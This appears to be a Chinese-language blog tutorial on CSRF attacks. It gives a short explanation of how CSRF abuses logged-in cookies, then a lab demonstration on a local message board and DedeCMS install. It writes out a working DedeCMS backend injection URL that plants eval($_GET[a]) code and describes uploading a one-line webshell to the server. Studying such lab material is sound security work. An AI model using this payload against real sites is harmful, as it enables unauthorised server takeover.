CSRF

我只是一个虾纸丫 提交于 2020-03-02 04:06:58

CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
CSRF的成因就是网站的cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,以后访问这个网站,都会默认你已经登录状态,而在这个期间,共计者发送构造好的csrf脚本或包含csrf链接,可能会执行一些用户不想做的功能(比如添加账号),说白了就是借用别人的cookie,去发送命令。

靶场演示

来到留言板,留言抓包
{%asset_img 1.png%}
{%asset_img 2.png%}
右键点击
{%asset_img 3.png%}
{%asset_img 4.png%}
生成的文件保存下来,点击提交
{%asset_img 5.png%}
{%asset_img 6.png%}
留言成功。
这里我搭建了一个dede_cms的网站
{%asset_img 7.png%}
这个cms有一个后台getshell的漏洞。
原文

http://localhost/dedecms/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//

使用这里的payload
{%asset_img 8.png %}
连接一句话木马
{%asset_img 9.png %}
检查是否成功
{%asset_img 10.png %}

file_put_contents

{%asset_img 11.png %}
{%asset_img 12.png %}
然后想服务器插入一句话木马文件
{%asset_img 13.png %}
插入成功
{%asset_img 15.png %}
{%asset_img 16.png %}
{%asset_img 17.png %}
{%asset_img 18.png %}
成功拿到webshell

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!